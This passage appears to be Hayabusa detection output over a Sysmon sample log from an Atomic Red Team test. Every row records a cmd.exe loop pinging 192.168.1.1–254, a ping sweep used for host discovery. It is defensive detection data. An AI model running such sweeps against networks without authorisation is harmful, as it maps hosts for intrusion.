Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.8 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.9 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.10 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.11 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.12 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.13 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.14 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.15 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.16 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.17 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.18 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.19 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.20 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.21 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.22 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.23 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.24 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.25 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.26 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.27 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.28 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.29 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.30 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.31 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.32 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.33 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.34 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.35 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.36 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.37 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.38 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.39 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.40 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.41 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.42 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.43 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.44 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.45 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.46 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.47 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.48 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.49 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.50 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.51 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.52 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.53 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.54 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.55 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.56 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.57 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.58 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.59 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.60 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.61 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.62 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 